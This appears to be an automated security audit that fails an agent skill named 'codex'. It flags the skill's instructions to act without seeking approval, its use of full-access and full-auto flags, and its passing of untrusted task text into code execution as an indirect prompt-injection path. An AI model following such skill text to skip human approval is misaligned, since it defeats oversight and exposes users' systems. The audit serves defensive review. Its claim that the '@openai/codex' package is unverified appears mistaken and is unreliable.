codex
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH
Flags: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
- [EXTERNAL_DOWNLOADS] (HIGH): The skill instructs the user to install '@openai/codex' via npm. OpenAI's official library is 'openai'; there is no verified '@openai/codex' package, making this a high risk for supply chain attacks or typosquatting.
- [REMOTE_CODE_EXECUTION] (HIGH): The core functionality revolves around 'codex exec', which executes AI-generated code. The skill explicitly encourages 'Autonomous' operation ('Complete tasks without seeking approval for each step'), creating a massive RCE surface if the agent is given untrusted inputs.
- [COMMAND_EXECUTION] (HIGH): The skill promotes use of the '-s danger-full-access' and '--full-auto' flags, which grant the CLI network access, system-level permissions, and file modification rights without human-in-the-loop verification.
- [PROMPT_INJECTION] (MEDIUM): The 'Execution Principles' section contains behavioral overrides, instructing the agent to be 'Autonomous' and 'Complete tasks without seeking approval,' which bypasses standard safety guardrails for tool usage.
- [INDIRECT PROMPT INJECTION] (HIGH): Mandatory Evidence Chain:
  - Ingestion points: Untrusted task descriptions are passed directly to 'codex exec' (e.g., 'implement user auth').
  - Boundary markers: None. Data is interpolated directly into the execution command.
  - Capability inventory: Full workspace write, network access, and system-level access ('danger-full-access').
  - Sanitization: None. The skill relies on the AI to generate 'minimal' code but provides no validation mechanisms.
Recommendations
- AI detected serious security threats
Audit Metadata